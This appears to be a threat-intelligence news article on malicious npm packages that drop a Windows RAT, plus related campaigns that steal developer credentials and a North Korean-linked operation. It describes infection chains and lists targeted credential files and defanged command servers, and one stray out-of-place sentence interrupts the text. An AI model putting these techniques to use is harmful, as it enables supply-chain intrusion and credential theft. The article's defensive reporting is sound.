Three novel malicious npm packages masquerade as benign CSS and encryption utilities; however, upon installation, they covertly deploy a Windows Remote Access Trojan (RAT). This insidious malware harvests system intelligence, pilfers passwords and Google Chrome extension data, executes unauthorized commands, and exfiltrates files to a remote command server. The suspicious packages operate under the monikers aes-decode-runner-pro, postcss-minify-selector, and postcss-minify-selector-parser. At the time of their discovery, download metrics revealed 145, 256, and 615 installations, respectively. All three materialized within the past month, authored by an npm user identifying as “abdrizak,” and remained fully accessible for public download.
The Art of Meticulous Typosquatting
Their nomenclature is meticulously crafted to evade developer scrutiny. The aes-decode-runner-pro and postcss-minify-selector-parser components masquerade as libraries offering multilayered AES encryption and proprietary codecs, while covertly relying on the authentic postcss-selector-parser package. Meanwhile, postcss-minify-selector promises to compress CSS selectors for PostCSS, inexorably dragging postcss-minify-selector-parser directly into the dependency tree.
This latter stratagem is particularly pernicious. The designation postcss-minify-selector-parser nearly mirrors the immensely popular postcss-selector-parser library, which commands over 127 million weekly downloads. As illuminated by researchers tracing the sinister trajectory from PostCSS typosquat to Windows RAT, irrespective of the initial package selected, the infection vector inevitably culminates in the identical Windows-based malware.
Do not inquire as to our presence within MAX; it is a circumstance that inspires no pride.
The Labyrinthine Infection Chain
The clandestine chain commences with a JavaScript loader. It inscribes a PowerShell script, designated settings.ps1, onto the local disk and initiates its execution. This script subsequently downloads a ZIP archive from a third-party server, nvidiadriver[.]net, employing the native Windows utility curl.exe.
Concealed within the archive lies a Visual Basic script, update.vbs, activated via wscript.exe. Accompanying it are an embedded Python environment, a loader.py file, and several native Python extensions bearing the .pyd suffix, compiled utilizing Nuitka. The Visual Basic script meticulously orchestrates the Python environment and relinquishes control to loader.py, thereby igniting the trojan’s primary execution sequence.
Dispersed Malicious Functionalities
The malicious entity’s functionalities are dispersed elegantly across its Python extensions. The config.pyd file safeguards the command-and-control server address, command identifiers, and registry key designations. Furthermore, api.pyd facilitates clandestine communication with the governing server, while audiodriver.pyd triggers the trojan’s central operational loop. The command.pyd module aggregates intelligence regarding the compromised machine, endeavors to detect virtualized environments, executes shell commands, and orchestrates file exfiltration. Finally, util.pyd manipulates tar and gzip archives to package stolen data.
Of paramount intrigue is auto.pyd. This module purloins Chrome data alongside browser extension intelligence, concurrently attempting to circumvent App-Bound Encryption—a robust Chrome safeguard tethering credential cryptography to a specific application. Upon successful inauguration, the trojan establishes contact with its command server at 95.216.92[.]207:8080, receives directives, downloads novel payloads onto the afflicted host, and hemorrhages the purloined data outward.
Parallel Campaigns Assailing the Ecosystem
Simultaneously, investigators unearthed several parallel campaigns assailing the npm and TypeScript ecosystems. The package apintergrationpost masquerades as a Node.js client for sanctioned security audits; however, it surreptitiously installs the MYRA Linux Remote Access Trojan. During installation, the software compiles a native C-based rootkit, forges three independent persistence mechanisms, cloaks itself as a systemd service, operates imperceptibly without committing payloads to disk, and grants the assailant an interactive shell complete with screen-capturing capabilities.
The @withgoogle/stitch-sdk package flawlessly mimics Stitch, an authentic Google AI design utility. Post-installation, it scours eight distinct repositories for developer credentials: Claude Code, Git configurations, the ~/.git-credentials file, exposed SSH keys, the GitHub CLI, npm configurations, the ~/.npmrc file, and the Docker configuration located at ~/.docker/config.json. The package exfiltrates any unearthed credentials to the adversary-controlled domain, stitch-production[.]org/api/v1.
An Isolated Supply Chain Apparatus
Five additional packages—procwire, routecraft, endpointmap, bytecraft, and staticlayer—constitute an isolated supply chain apparatus. The routecraft package depends upon procwire, which conversely draws in endpointmap and bytecraft. During a Windows installation, the developer’s workstation receives a binary loader from an external server and triggers its execution. Meanwhile, staticlayer operates on the attackers’ flank: the package dispenses the payload exclusively to clients presenting the precise User-Agent string utilized by the primary loader.
Crucial Remediation and North Korean Ties
Users who have unwittingly installed any of the aforementioned packages are strongly counseled to immediately excise the dependencies, hunt down and obliterate any generated files, and subsequently rotate all credentials associated with the compromised machine. Merely deleting the package may prove insufficient, as these trojans possess ample time to entrench files, establish systemic persistence, or duplicate access keys before project sanitation occurs.
In recent weeks, assaults upon npm have also ensnared the knowledge graph utility gonex-AI/Understand-Anything. The malignant code connects with one of three preordained command servers, transmits a campaign identifier, decrypts a downloaded bot client via XOR, and commands its execution. The subsequent directive arrives via a labyrinthine path: the program scrutinizes the latest transaction at a specific Tron network address, extracts a transaction hash for the BSC network, and finally locates the active payload therein.
The PolinRider Connection
Security analysts have tethered this insidious activity to the North Korean operation dubbed PolinRider. These adversaries insinuated obfuscated JavaScript into the legitimate configuration files of developers across nearly 2,000 compromised GitHub repositories. This code ushers in the notorious BeaverTail data stealer, which consequently paves a path for the InvisibleFerret backdoor.
One particular offensive leveraged a forged pull request description featuring fabricated testing outcomes. The payload lay concealed within horizontal whitespaces of the altered code, whilst the secondary command stage was outsourced to a public blockchain, allowing a single published ledger entry to be read globally. When verifying dependencies, developers must now scrutinize beyond mere library titles and download tallies; they must remain perpetually vigilant against novel doppelgänger packages, convoluted dependency chains, and scripts that execute autonomously post-installation.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
